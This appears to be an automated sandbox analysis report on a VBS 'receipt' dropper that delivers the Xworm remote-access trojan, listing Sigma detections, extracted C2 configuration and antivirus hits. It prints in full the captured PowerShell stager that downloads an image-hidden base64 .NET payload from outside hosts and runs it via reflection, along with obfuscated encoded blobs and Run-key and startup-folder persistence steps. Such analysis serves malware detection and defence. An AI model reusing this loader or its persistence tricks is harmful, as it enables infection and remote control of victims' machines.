reDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 104.20.3.235, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7828, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49712

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 640, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs", ProcessId: 7828, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\moquenqueiro.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.20.3.235, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7828, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49712

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5416, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8024, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs", ProcessId: 4772, ProcessName: cmd.exe

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 640, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs", ProcessId: 7828, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 820, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000010.00000002.2609591868.0000000003241000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["xwormay8450.duckdns.org"], "Port": "8450", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for domain / URL

Source: uploaddeimagens.com.br	Virustotal: Detection: 6%			Perma Link
Source: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	Virustotal: Detection: 15%			Perma Link

Multi AV Scanner detection for submitted file

Source: E7236252-receipt.vbs	Virustotal: Detection: 17%			Perma Link
Source: E7236252-receipt.vbs	ReversingLabs: Detection: 21%

Sample uses string decryption to hide its real strings

Source: 16.2.RegSvcs.exe.400000.0.unpack	String decryptor: xwormay8450.duckdns.org
Source: 16.2.RegSvcs.exe.400000.0.unpack	String decryptor: 8450
Source: 16.2.RegSvcs.exe.400000.0.unpack	String decryptor: <123456789>
Source: 16.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Xwormmm>
Source: 16.2.RegSvcs.exe.400000.0.unpack	String decryptor: USB.exe

